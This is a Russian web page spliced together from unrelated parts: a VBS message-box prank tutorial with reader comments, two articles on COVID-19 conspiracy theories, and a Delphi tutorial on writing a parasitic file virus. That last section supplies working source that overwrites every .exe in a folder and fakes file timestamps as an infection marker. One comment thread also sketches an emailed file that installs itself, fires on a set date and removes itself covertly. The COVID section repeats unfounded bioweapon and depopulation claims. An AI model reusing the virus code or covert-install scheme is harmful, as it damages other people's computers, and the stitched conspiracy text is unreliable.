Портал Mz-Don

Меню
  • Контакты
  • Статьи
  • Блог

Делаем вирус который изменит все

Здравствуйте! В этом посте (первом) я покажу, как создавать вирус шутку через блокнот. Сразу прошу не бомбить и не писать гневные комменты типа: "Да такого миллион!", "Да что ты знаешь!", "Да пошел ты в жопу!" и т.д. Да, я знаю, что эти "вирусы" создавали давно. Но я к примеру открыл для себя это совсем недавно. Месяца 3 назад.

Ближе к делу: я буду рассказывать что эта шутка вообще делает, буду вставлять скрины и все объяснять. Напомню, это ознакомительный пост! В других постах я буду конкретно писать, как создать такой-то вирус.

Вирус-шутка это программа, которую создают в блокноте. Т.е. пишешь там команды и сохраняешь их определенных форматах. Если все правильно сделано, без ошибок, то вирус-шутка сработает. Кстати, "вирус-шутка" это условное название. В блокноте можно создать и игру, и крестики нолики, часы.

ПРЕДУПРЕЖДЕНИЕ. Перед созданием вируса отключите Анти-Вирус.

1) Создание вируса: Для начала откройте блокнот.


2) В блокноте начинайте писать команду. Для начала скопируйте этот текст туда:

msgbox"Ты не против, если я буду жить у тебя в компе?",32+4,"Вопрос"

msgbox"Ок, ты не против",64,"Я понял"

msgbox"Ок, ты не против",64,"Я понял"

msgbox"Это шутка, это НЕ вирус :) ХАХАХАХА",64,"Я пошутил"

msgbox"Или же нет. ",64,". "

Я НЕ ЖЕЛАЮ ВАМ ЗЛА! ЭТОТ ВИРУС НЕ МОЖЕТ ПРИНЕСТИ ВАМ И ВАШЕМУ КОМПУ ВРЕДА!


3) Сохраните ваш текст в формате .vbs Смотрите далее.




4) Теперь у вас на Рабочем столе должен появиться вот такой значок:


5) Заходите в него.

6) У вас должен открыться вирус-шутка. Если же не работает, то два варианта: либо у вас включен Анти-Вирус, либо ваш комп не поддерживает это.


7) НЕ ПУГАЙТЕСЬ! ВИРУС-ШУТКА НЕ ПРИНЕСЕТ ВРЕДА. Теперь вам осталось читать то, что там написано, и кликать по кнопкам (любым).

Вы можете изменить в команде вируса текст. Например вместо "Windows удалить?" можно написать "ставьте лайки!". Удачи вам, экспериментируйте со своими вирусами!

И так, как я обещал, это был ознакомительный пост. Вскоре я выложу пост, где подробно опишу все значения, как все делать и т.д. Отпишитесь в тапках как вам мой пост, киньте скрины своего вируса. Мне будет интересно :D

сука! у меня винда удалилась!

Не ври. Этот вирус-шутка и близко такого сделать не может.

ТС, у вас тоже снегопад? Занятия в школах отменили?

Да, отменили. Вот и сижу, "клавотюкаюсь".

Мне хочется узнать все подробно как это работает что обозначает msgbox, цифры 64; 32+4

"msgbox" - название команды, которая выводит стандартный диалог. Цифрами выбирается стиль отображения (иконка внутри диалога и воспроизводимый звук при открытии). Также стилем выбираются кнопки (их текст и количество)

Отображаемых иконок всего 4: ошибка, вопрос, восклицание и внимание. Столько-же звуков.
Кнопок в связке по более:
Ок
Ок, Отмена
Да, Нет
Да, Нет, Отмена
Повтор, Отмена
Пропустить, Повторить Отменить

Т.к. эти диалоги выдаются системой, то можно указать только заголовок и текст диалога. Свой текст кнопок или свою иконку Вы не сможете установить. Можно вывести диалог без иконки. Вроде ничего не забыл. Давно увлекался этим, потом перешел на норм. язык программирования.

Ой, а может поможете раз разбираетесь?

Хочу коллегу разыграть/ поздравить с днем рождения. Он в командировке сейчас. Хочу ему на почту файл бросить который в определенный день ему на принтер выведет поздравление. Как можно батник сделать, чтобы он себя в автозагрузку прописал и именно в определенный день сработал? Ну и удалился потом, чтоб он не догадался.

В инете поискал, там только на удаление доков батники) и определенного дня нельзя поставить.

Если хотите именно батник, то можно попробовать использовать планировщик Windows, но с батниками куча ограничений.

О поздравлялке: даже если Вы отправите эл. письмо с батником или exe-шником, то поздравление не сработает, пока его не скачают и не запустят. В некоторых случаях почтовый сервис может отправить письмо в папку "Спам" (пользователь его не увидит), либо при скачивании файл заблокирует антивирус, но это все маловероятно.

На счет печати принтером: это можно, но обязательно? Можно например вывести на экран красивый диалог, или картинку :)

Нет с программкой не тот эффект))) Да и вк нету.

Просто хотелось отправить на почту письмо, (его обязательно откроют, так как с этого адреса только по работе приходит, да и с чувством опасности у людей проблемы))), чтоб этот файл прописался в планировщик или в автозагрузку, а в нужный день отправил бы на печать текст. Там принтер ежедневно включают, так что по-любому бы удивил)))

Я батники когда-то давно делал. Даже похожий прикол видел, когда из планировщика каждый день на печать выходит "Ты умрешь через *** дней", "Ты умрешь завтра", "Это случится сегодня". Но там надо было за компом посидеть, чтоб настроить. А как это "дистанционно" через почту сделать я не знаю.

В любом случае спасибо.

Хм, думаю, что через батник хоть и сложно, но реально: батник запускает установщик Windows (msiexec.exe) с параметром, который скачает и установит программу и документ с текстом печати. Программа прописывается в автозапуск и следит за датой и временем системы. Как только дата начала наступает, программа запускает скрытый процесс Microsoft Office Word (winword.exe) с параметром начала печати нашего документа. Программа делает какую-нибудь отметку на каком-либо ресурсе (сайте или сервере), что она успешно отработала. Запускается msiexec.exe с параметром удаления нашей программы (программа удаляется с компьютера).

Несколько вопросов:
- на компьютере есть MS Office Word? Иначе придется создавать документ формата .rtf (поддерживается системой без доп. софта)
- проще изначально в письме использовать не батник, а именно приложение (exe-файл, т.к. не придется сначала создавать, а после скачивать установщик). Если нужно, то предоставлю исходный код приложения. Язык программирования - AutoIt 3. Его синтаксис очень напоминает рассматриваемые в посте скрипты. Так может лучше обойтись без батника?
- нужны дата запуска печати документа и текст поздравления
- желательно заранее знать, какая операционная система установлена на компьютере, где будет выполняться "поздравлялка" (XP, Vista, 7, 8, 8.1, 10 или серверные редакции систем Windows)?

Вместе с появлением в Китае нового типа коронавируса CoViD-19 и распространением его по миру с той же скоростью стали возникать и расходиться конспирологические версии о том, что на самом деле болезнь не так страшна, а гораздо страшнее — нагнетаемая паника. Якобы с помощью неё что-то пытаются от нас скрыть. Собрали для вас несколько версий — что именно.


Сама ситуация со вспышкой эпидемии коронавируса в Китае всё больше напоминает голливудский фильм-катастрофу. Вспыхнув накануне наступления Нового года по григорианскому календарю, мутировавший вирус уже убил пять тысяч человек, парализовал экономику всего мира, отменил сотни важных мероприятий, улицы многих городов опустели, люди поддаются панике и пытаются любыми средствами защититься от заболевания. А тем временем.

"Пытаются протащить поправки в конституцию"


Это одна из главных версий, которая обсуждается в основном на просторах Сети. Люди записывают видео, боты раскидывают комментарии к новостям: мол, "кровавый режим настолько хитёр и жесток, что заразил целый мир, лишь бы удержать власть". По мнению таких диванных конспирологов, от процесса обсуждения и принятия поправок в Конституцию России власти пытаются отвлечь всеми силами, что чуть ли не сами придумали этот коронавирус. Более того, запрет в Москве на проведение массовых мероприятий численностью свыше 5000 человек и 1000 человек в Петербурге якобы ввели не для того, чтобы коронавирус не распространился, а чтобы люди протестовать не вышли.


Правда, в погоне за хайпом и лайками некоторые не учли, что при таком раскладе, если бы вовремя не были приняты меры, то и само голосование могло бы быть под угрозой. Да и насколько нужно быть всесильным, чтобы целый мир ради этого заразить.

Грядёт третья мировая


Такую гипотезу стали высказывать почти сразу после появления вируса. Представитель Народно-освободительной армии Китая, полковник Дай Ху заявил, что спецслужбы США ещё в 2003 году запустили к ним вирус H7N0. Америка тогда воевала с Ираком и боялась, что Китай воспользуется этим в своих целях. И вот для того, чтобы отвлечь китайское руководство, американцы применили биологическое оружие.

В этот раз, по мнению военных, кто-то использует коронавирус, чтобы провести таким образом разведку боем. Пока весь мир пытается побороть распространившуюся заразу, заинтересованная сторона наблюдает за действием войск химической и биологической обороны разных стран и делает выводы. И так, по одной из версий, происходит подготовка к третьей мировой войне. То есть коронавирус — не только оружие-приманка, но и способ отвлечь от подготовки к реальным боевым действиям.


Ещё одна обсуждаемая в местных чатах и комментариях ко многим статьям о коронавирусе версия — на этом зарабатывают фармакологические компании. Деньги в этой сфере вращаются огромные. Пока мы все с вами думаем, какое же средство эффективнее против вируса, лаборатории срывают куш на разработке действующей вакцины. Так, главврач московской Городской клинической больницы № 71 Александр Мясников напомнил, что первая вспышка острой вирусной инфекции, вызванной коронавирусом летучих мышей (SARS-CoV), произошла в Китае в 2002 году. По мнению многих вирусологов, тогда вспышку инфекции не победили, она просто сама сошла на нет. То есть кто-то переложил существенные государственные средства, полученные от налогоплательщиков, в карманы частных фармацевтических компаний.

Титанические усилия были проделаны и средства потрачены. То есть освоены. Повторюсь: 100 млрд долларов, по некоторым опубликованным данным. Мне продолжать мысль, или нашему человеку ничего дальше объяснять не надо?! За 18 лет 8092 заболели, 774 умерли. От гриппа ежегодно столько заболевает и умирает в любом миллионном городе. (Нет, от осложнений гриппа куда больше!) А тут почти 20 лет сидеть на таком финансировании!

Александр Мясников, главврач ГКБ № 71 г. Москвы

Грядёт финансовый апокалипсис

Ещё одна версия, связанная с деньгами: все знали, что на мировом рынке возникнет кризис, причём более серьёзный, чем все предыдущие, поэтому и решили разгонять тему с коронавирусом. И действительно, всё сходится: как только CoViD-19 стал выходить на пик заболеваемости, рухнули цены на нефть, а за ними и рубль. Но людям, конечно, куда там думать о мировой экономике, им бы о своём здоровье позаботиться. А пока цены растут.

А ведь Грета предупреждала

И ещё одна глобальная проблема, от которой пытаются отвлечь коронавирусом, — экологическая катастрофа. На самом деле, говорят конспирологи, экологическая фобия в современном мире распространяется куда быстрее, чем любая другая информация. Ведь Грета Тунберг в своём выступлении на форуме в Давосе напрямую сказала: "Я хочу, чтобы вы паниковали". А вот чтобы от паники экологической как-то людей отвлечь и заставить их, например, перестать пользоваться многоразовыми сумками при походе за продуктами, а брать пластиковые пакеты и поддерживать их производство, коронавирус и придумали. Самой шведской активистке даже пришлось отменить "забастовки школьников и студентов", придуманные ею в защиту окружающей среды.

School strike week 82. In a crisis we change our behaviour and adapt to the new circumstances for the greater good of society.

Подобных теорий о том, что коронавирусом нас на самом деле от чего-то отвлекают, ещё немало. Мы привели лишь основные. Но рождаются они и распространяются в Сети едва ли не быстрее самой болезни. Вот только с коронавирусом-то в конце концов справятся, а с тягой рождать фейки всё гораздо сложнее.


Лайф разбирался, для чего по всему миру развёрнуты тысячи биологических лабораторий и почему коронавирус может быть оружием.

Страх всегда порождал множество слухов. Особенно когда дело касалось чего-то неизведанного. Исключением не стал и коронавирус. В последнее время всё чаще говорят о том, что пандемия могла стать новым витком гибридной войны. Такое утверждение поначалу кажется весьма безумным. Однако уровень должностей тех, кто высказывает такие теории, невольно заставляет задуматься: а может, всё это правда?

Новый виток мировой войны


О том, что в мире идёт гибридная война, не говорит только ленивый. Ближний Восток, Африка, мировые финансовые рынки, Интернет и обычные СМИ давно стали полем боя больших держав. О том, как уничтожить противника, не доставая меча из ножен, знали ещё наши далёкие предки. Отравленные колодцы во времена древних войн были такой же распространённой практикой, как и другие военные хитрости.

Отказаться от этого знания в современном мире было бы так же глупо, как поднять белый флаг. Поэтому каждая сверхдержава имеет центры для разработки биологического оружия. Логика весьма проста: чтобы защитить собственное население от возможных атак, нужно иметь вакцины. А разработать и протестировать их можно, лишь имея образцы вируса. Однако причиной глобальной трагедии иногда может стать простая человеческая халатность. Неудивительно, что на фоне мировой пандемии коронавируса теория о его утечке из одной из лабораторий получила такое широкое распространение.

Расовое оружие китайцев


Причиной массового распространения вируса может быть не только простая утечка, но и тонкий расчёт, направленный на создание расового оружия. Такую версию, в частности, высказал портал Stringer. В статье, которую издание достало из архивов 2002 года, приводятся слова президента Китайской академии наук профессора Жу Чена о том, что китайские учёные хотят "сконцентрироваться на особенностях заболеваний, поражающих азиатское население, чтобы разработать препараты, адаптированные для жителей развивающихся стран". Столь повышенный интерес китайцев к "национальным особенностям заболеваний" издание связывает с возможной разработкой не просто биологического, а расового оружия, которое якобы может быть направлено на жителей других стран.

По словам эксперта издания, "если китайцы создадут вирус любой болезни, допустим, гриппа, для которого благоприятной средой будут "русские ферменты, отвечающие за расщепление алкоголя в крови", то "русские все умрут от этого гриппа. И освободят земли на Дальнем Востоке".


Поскольку первая вспышка инфекции произошла в Китае, утечка вируса из лаборатории в Поднебесной была бы самой правдоподобной теорией. И она не заставила себя ждать. Сразу после начала эпидемии Интернет заполнила информация о том, что вирус выбрался наружу из лаборатории, расположенной в провинции Хубэй. По сообщениям РИА "Новости", ещё в 2018 году Синьхуа сообщило об исследованиях в Уханьском институте вирусологии иммунных механизмов летучих мышей, которые длительное время могут быть переносчиками вирусов, но не болеть. Совсем недавно директор Национального центра по профилактике и контролю заболеваний КНР Тань Вэньцзе сообщил, что новый коронавирус на 90% схож с коронавирусом летучей мыши, которая обитает в городе Чжоушань провинции Чжэцзян.

Однако китайцы заявили, что виноваты торговцы с рынка, которые торговали дикими животными. В 33 из 585 образцов с рынка Хуанань, говорилось в сообщениях Синьхуа, были обнаружены нуклеиновые кислоты коронавируса, из образцов среды удалось выделить вирус. Это говорит о том, что источником вируса являются дикие животные, торговля которыми осуществлялась на рынке Хуанань.

Вектор на Запад


Сами китайцы поспешили перевести стрелки на западных "партнёров". 13 марта официальный представитель МИД Поднебесной Чжао Лицзянь опубликовал в своём твиттере ссылку на статью Центра исследования глобализации о том, что вирус на самом деле был создан в США, а в Китай его занесли американские военные во время военной олимпиады World Military Games, проходившей с 18 по 27 октября 2019 года.

В статье, например, приводятся слова тайваньского врача о том, что смерти от электронных сигарет, прокатившиеся по Штатам в августе прошлого года, были не чем иным, как первой вспышкой коронавируса. По мнению учёного, который даже написал письмо властям США, "симптомы и состояния не могли быть объяснены электронными сигаретами".

По странному стечению обстоятельств, говорится в материале, перед началом этой вспышки смертей от вейпов Центр по контролю и профилактике заболеваний США (CDC) закрыл основную биолабораторию Вооружённых сил США в Форте Детрик, штат Мэриленд, из-за отсутствия гарантий против утечек патогенных микроорганизмов.

Зачистка "золотого миллиарда"


Однако для массовой зачистки китайцев, которые в последнее время слишком активно вели себя на мировой арене и противопоставляли себя могущественным Штатам, вовсе необязательно было засылать заражённых военных в страну. Как считают последователи ещё одной "теории заговора", зачистку населения планеты могли организовать сторонники влиятельных американских кланов. Так, известный политтехнолог Сергей Гречишников объясняет, зачем им это нужно:

— Мировой кризис запланирован с целью "обнуления" позиций группы кланов, которые сделали доллар инструментом своего могущества, — сказал Гречишников. — Модель развития мира должна поменяться. Мы находимся в самом начале грандиозного перформанса. И никто пока не берётся предсказать, чем это закончится. Но выживет сильнейший.

По его словам, понимание архитектоники нынешнего глобального кризиса возможно только с позиций геополитического подхода. "Что мы видим? В начале — разрушение национальных экономик. Затем — смена политических элит. Третий, завершающий шаг должен привести к установлению нового мирового порядка в интересах победителя. Победитель получает всё".

— Основной инструмент — нагнетание глобального психоза. Утратившие критическое отношение к реальности обезумевшие массы будут готовы принять любого "спасителя". Сама мировая олигархия периодически ведёт дело к кризисам. Кризисы ей нужны для расширения и укрепления своих позиций, для перераспределения собственности. Кризис 2008–2009 годов привёл к перераспределению собственности. Ну кто мог подумать, что китайцы станут собственниками концерна "Вольво", а "Рено" объединится с "Ниссаном"? Китай — глобалистская держава. Ему нужен глобализм как экономическая модель, — объясняет Гречишников.

Также эксперт приводит две концепции, которые, возможно, используют крупные транснациональные компании. Согласно первой, в Китай нужно проникнуть и занять господствующие позиции, то есть приручить Китай. Вторая подразумевает, что нужно всеми способами остановить Китай, втянуть его в долгий внешний и внутренний кризис (примерно, как сделали с СССР), разложить его изнутри. Или как происходило с Японией, которая уже 25 лет не имеет экономического роста.


— А то ведь тоже наступала на пятки США. Поэтому США разрушают ту модель глобализации, которую сами же и создали в своё время. Эта модель стала работать на Китай, т.е. Китай её освоил. В ход идут разные инструменты. В том числе и коронавирус, который при нынешнем очень хорошем информационном обеспечении прямо на глазах сносит мировую и национальные экономики, — заключает эксперт.

Также он напоминает, что мировую элиту очень беспокоит уже более 200 лет (со времён Мальтуса) рост численности населения Земли. "Регулировать население с помощью традиционных мировых войн уже невозможно. Ищутся новые способы сокращения населения. Птичий грипп, свиной грипп, атипичная пневмония, лихорадка эбола, а теперь и коронавирус — и всё это за 17 последних лет. За вторую половину XX века я знал только один вирусный грипп повышенной опасности — гонконгский в 1968–1969 годах".

В подтверждение приводится сразу несколько фактов. Один из них — наличие ещё одной лаборатории в Ухани. По данным телеканала "Звезда", она "существует на деньги знаменитого банкира Джорджа Сороса".

— Она не только Сороса, но и китайская. И это может сработать. 11 миллионов населения — раз. Китайская ответственность выше. Если вирус сбежал, то отвечать будет Китай. А США и Сорос будут не при делах. Очень хороший план, — приводят журналисты слова директора Института региональных проблем Дмитрия Журавлёва.

Одним из направлений деятельности лаборатории является в том числе и изучение различных вирусов.


Но куда интереснее существование этой лаборатории выглядит на фоне деятельности другого представителя "золотого миллиарда" — Билла Гейтса. В октябре 2019 года, ровно в то же время, когда проходили военные игры в Китае, в Нью-Йорке прошли весьма необычные "учения". Центр медицинской безопасности Джона Хопкинса (входящий, к слову, в состав Школы общественного здоровья Блумберга) провёл со своими партнёрами — Международным экономическим форумом и фондом Билла и Мелинды Гейтс — мероприятие, названное "Событие 201" (англ. — Event 201). Участники учений исследовали… пандемию коронавируса и возможности государственно-частного партнёрства "во время реагирования на тяжёлую пандемию, чтобы уменьшить масштабные экономические и социальные последствия".

— В последние годы в мире растёт число эпидемических событий, ежегодно достигающих примерно 200 случаев, — говорится на официальном сайте мероприятия. — Эти события усиливаются и наносят ущерб здоровью, экономике и обществу. Управление этими событиями уже напрягает глобальный потенциал, даже при отсутствии угрозы пандемии. Эксперты сходятся во мнении, что только одна из этих эпидемий станет глобальной — пандемия с потенциально катастрофическими последствиями. Тяжёлая пандемия, которая станет "Событием 201", потребует надёжного сотрудничества между несколькими отраслями, национальными правительствами и ключевыми международными институтами.

Впоследствии Центр медицинской безопасности Джона Хопкинса заявил, что "исходные данные, которые мы использовали для моделирования потенциального воздействия этого вымышленного вируса, не похожи на 2019-nCoV". Но сам факт проведения такого масштабного мероприятия и последовавшая за этим пандемия коронавируса выглядят устрашающе.

Поверить, что американцы ничего не знали, вдвойне сложно, когда смотришь на вышедшую в декабре прошлого года обложку журнала The Economist с заголовком "Мир в 2019 году". Журнал имеет славу рупора дома Ротшильдов, а выпускаемые им обложки становятся поводом для сотен "пророческих" предсказаний.


В нижней левой части обложки изображён панголин. Да-да, именно с поеданием этого зверька учёные стали связывать распространение вируса в Китае. Но первые сообщения о том, что метагеномы жертв коронавируса и панголина совершенно идентичны, появились лишь 7 февраля 2020 года.

Самой страшной теорией из всех возможных является мысль о том, что вирус вышел из-под контроля и начал мутировать. Некоторые специалисты высказывают предположение, что этим может быть вызвана высокая смертность от CoViD-19 в Италии и Испании.

"Из вчерашней беседы с военным вирусологом: В Италии мы, похоже, имеем дело с новой мутацией вируса. Там, на севере, действует свой природный очаг вирусов, многие эпидемии начинались как раз там. Возможно, это сыграло свою роль. Когда эпидемия закончится и мы начнём сравнивать вирусы из разных мест, мы многое узнаем", — написал в своём фейсбуке заместитель главного редактора газеты "Завтра" Влад Шурыгин.

HLLO- High Level Language Overwrite. Такой вирус перезаписывает программу своим телом. Т.е.
программа уничтожается, а при попытке запуска программы пользователем- запускается вирус и "заражает" дальше.

HLLC- High Level Language Companion. Большинство таких вирусов от-носятся к седой древности (8-10 лет назад), когда у пользователей стоял ДОС и они были очень ленивы. Эти вирусы ищут файл, и не изменяя его, создают свою копию, но с расширением .COM. Если ленивый пользователь пишет в командной строке только имя файла, то первым ДОС ищет COM файл, запуская вирус, который сначала делает свое дело, а потом запускает ЕХЕ файл. Есть и другая модификация
HLLC - более современная (7 лет ;)): Вирус переименовывает файл, сохраняя имя, но меняя расширение- с ЕХЕ на, допустим, OBJ или MAP. Своим телом вирус замещает оригинальный файл. Т.е. пользователь запускает вирус, который, проведя акт размножения, запускает нужную программу- все довольны.

HLLP- High Level Language Parasitic. Самые продвинутые. Приписывают свое тело к файлу спереди (Первым стартует вирус, затем он восстанавливает программу и запускает ее) или сзади
- тогда в заголовок проги мы пишем jmp near на тело вируса, все-таки запускаясь первыми.

Саму же программу мы можем оставить в неизменном виде, тогда это будет выглядеть так:

MZТело злобного вируса
MZКод программы

Что такое MZ, я думаю, ты догадался 🙂 Это же инициалы твоего любимого Марка Збиковски, которые он скромно определил в сигнатуру exe файла 🙂 А вписал я их сюда только для того, чтобы ты понЯл
- заражение происходит по принципу copy /b virus.exe program.exe, и никаких особых приколов тут нет. Сейчас нет. Но мы их с тобой нафигачим
- будь здоров :). Ну, например: можно первые 512 или больше байт оригинальной программы зашифровать любым известным тебе алгоритмом- XOR/XOR, NOT/NOT, ADD/SUB, тогда это будет выглядеть как:

MZтело злобного вируса
XORed часть ориг. проги
Неизменная часть ориг. проги

В этом случае структура зараженного файла не будет так понятна.
Я не зря тут (в классификации, в смысле) так распинаюсь
- parasitic-алгоритм используют 90% современных вирусов, независимо от их способа распространения. Ладно, идем дальше:

Сетевой вирус. Может быть любым из перечисленных. Отличается тем, что его распространение не
ограничивается одним компом, эта зараза каким-либо способом лезет через инет или локальную сеть на другие машины. Я думаю, ты регулярно выносишь из мыльника 3-4 таких друга
- вот тебе пример сетевого вируса. А уж попав на чужой комп, он заражает файлы произвольным образом, или не заражает ВООБЩЕ.

Макро вирусы, скриптовые вирусы, IRC вирусы. В одну группу я определил их потому, что это вирусы, написанные на языках, встроенных в приложения (MSOffice :)), скриптах (тут рулит твой любимый VBS) и IRC скриптах. Строго говоря, как только в каком-то приложении появляется достаточно мощная (и/или дырявая) скриптовая компонента, на ней тут же начинают писать вирусы 😉 Кстати, макро вирусы очень просты и легко определяются эвристикой.

Дошли 🙂 Давай, запускай дельфи, убивай всякие окошки и вытирай из окна проекта всю чушь. То есть вообще все вытирай 🙂 Мы будем работать только с DPRом, содержащим:

program EVIL_VIRUS;
USES WINDOWS,SYSUTILS;
begin
end;

Логику вируса, я думаю, ты уже понял из классификации- восстанавливаем и запускаем прогу--> ждем завершения ее работы--> стираем "отработавший файл" (забыл сказать- мы НЕ ЛЕЧИМ зараженную прогу, мы переносим оригинальный код в левый файл и запускаем его. ПРИМЕР: Зараженный файл NOTEPAD.EXE. Создаем файл _NOTEPAD.EXE в том же каталоге с оригинальным кодом, и запускаем уже его).--> ищем незараженное файло и заражаем. Это все 🙂 Базовая конструкция вируса выглядит именно так.

Объяви теперь для своего могучего мозга следующие переменные и константы:

VaR VirBuf, ProgBuf, MyBuf : array of char;
SR : TSearchRec;
My,pr : File;
ProgSize,result : integer;
PN,st : String;
si : Tstartupinfo;
p :Tprocessinformation;
infected : boolean;
CONST VirLen: longint= 1000000;

Первой строчкой идут динамические массивы, в которые мы будем писать соответственно тело вируса и программы; В переменную SR запишутся
характеристики найденного файла-кандидата на заражение (надеюсь, ты знаком с процедурами FindFirst и FindNext, потому что дальше будет хуже ;)), My и
Pr - это файл, откуда мы стартовали и левый файл с оригинальным кодом программы (я про него уже писал выше). result- результат работы FindFirst, он должен быть равен нулю,
ProgSize - размер кода программы. Остальное ясно из дальнейшего, кроме
infected - это признак зараженности найденного файла и
VirLen- это длина кода вируса, ее ты узнаешь только после свадьбы. Тьфу, я хотел сказать, после компиляции. Т.е. компилируешь, меняешь значение константы в исходнике и перекомпилируешь.
Кодим далее 🙂 Здесь ты видишь код, ответственный за восстановление и запуск зараженной программы:

SetLength (virbuf,VirLen);
AssignFile (my,ParamStr(0));
st:= paramstr(0);
St:= st+#0;
CopyFile (@st[1],'c:\windows\program.exe',false);
IF FileSize (my)> VirLen then
begin
//Запуск программы
AssignFile (my,'c:\windows\program.exe);
Reset (my);
ProgSize:= FileSize(my)-VirLen;
BlockRead (my,virbuf,virlen);
SetLength (progbuf,pRogSize);
BlockRead (my,progbuf,progSize);
CloseFile (my);
PN:= '_'+ParamStr(0);
AssignFile (pr,PN);
ReWrite (pr);
BlockWrite (pr,progbuf,progSize);
CloseFile (pr);
FillChar( Si, SizeOf( Si ) , 0 );
with Si do
begin
cb := SizeOf( Si);
dwFlags := startf_UseShowWindow;
wShowWindow := 4;
end;
PN:= PN+#0;
Createprocess(nil,@PN[1],nil,nil,false,Create_default_error_mode,nil,nil,si,p);
Waitforsingleobject(p.hProcess,infinite);
//Запустили, программа отработала. Сотрем ее 🙂
ErAsE (pr);
Erase (my);

Тут все, в принципе просто и понятно, кроме того, зачем я перенес весь зараженный файл в каталог к виндам и что делают строчки с 3 по 5 включительно.
А сделал я это потому, что читать из запущенного файла некомфортно и возможно только с использованием CreateFile и ReadFile WinAPI. Про кодинг на WinAPI я расскажу позднее, сейчас я разберу только основы
- на Delphi.

Строчки эти - преобразование string в pchar народным методом, поскольку мы сейчас боремся за каждый байт кода. Еще момент: я поступил некорректно, задав путь c:\windows так жестко. Пользуйся лучше процедурой GetWindowsDirectory, узнай точно 🙂 Все остальное понятно без всяких комментариев (если нет
завязывай прогуливать информатику ;)), идем дальше:

result:= FindFirst ('*.exe',faAnyFile,sr);
WHILE Result= 0 DO
begin
//Проверка на вшивость
Infected:= false;
IF DateTimeToStr (FileDateToDateTime (fileage (sr.name)))= '03.08.98 06:00:00' then infected:= true;
//Проверено!
IF (infected= false)and (sr.name<>paramstr(0)) then
begin
AssignFile (my,sr.Name);
ReWrite (my);
BlockWrite (my,virbuf,virlen);
BlockWrite (my,progbuf,sr.Size);
CloseFile (my);
FileSetDate (sr.Name,DateTimeToFileDate(StrToDateTime ('03.08.98 06:00:00')));
end;
end;

//Если вир запущен "чистым", т.е. не из зараженной про-граммы, то завершаемся
end else halt;

Что же твой зоркий глаз видит тут? Правильно, процедура FindFirst ищет нам заданную жертву (любой exe файл из текущего каталога), передает его характеристики в переменную SR. Затем необходимо его проверить на зараженность. Это делается оригинально: при заражении файлу присваивается опр. дата и время. И любой файл с такими характеристиками считается зараженным. Все остальное опять же нецензурно просто, поэтому я плавно перехожу к заключению 🙂

Вот мы и накодили наш первый вирус. Пока он умеет только заражать файлы в текущем каталоге (хотя, я уверен, ты его легко модернизируешь ;)) и ничего не знает про другие каталоги и интернет. Не отчаивайся, мы его этому быстро обучим. Пока поиграйся с этими строчками, и жди следующей статьи.

Рискну дать тебе описание всех процедур, использованных в статье. Это поможет тебе искать их в хелпе и подготовиться к кодингу серьезных вирусов с использованием
WinAPI.

AssignFile - в WinAPI нет аналога - сопоставляет файл
с переменной типа File или TextFile

Reset - аналоги _lopen и CreateFile - открывает
существующий файл и устанавливает позицию
чтения в начало

ReWrite - _lcreate и CreateFile - создает новый файл и
уст. позицию чтения в начало. Если скормить
ReWrite существующий файл, его содержимое
будет обнулено

BlockRead - _lread и ReadFile - читает в буфер
определенное количество данных из файла

BlockWrite - _lwrite и WriteFile - соответственно, пишет
данные в файл

SeekFile - _llseek и SetFilePointer - перемещает позицию
чтения/записи в открытом файле

CloseFile - _lclose и CloseHandle - закрывает открытый
файл

Erase - DeleteFile - удаление файла

FindFirst - FindFirstFile - поиск файла по критериям

FindNext - FindNextFile - поиск следующего файла

Читайте также:

  • Если не сказать что болеешь гепатитом
  • Анализ крови на вирусы хеликс
  • Мазь виферон для профилактики гриппа отзывы
  • Выделение вируса в клеточной культуре
  • У сына гепатит с что делать
  • Контакты
  • Политика конфиденциальности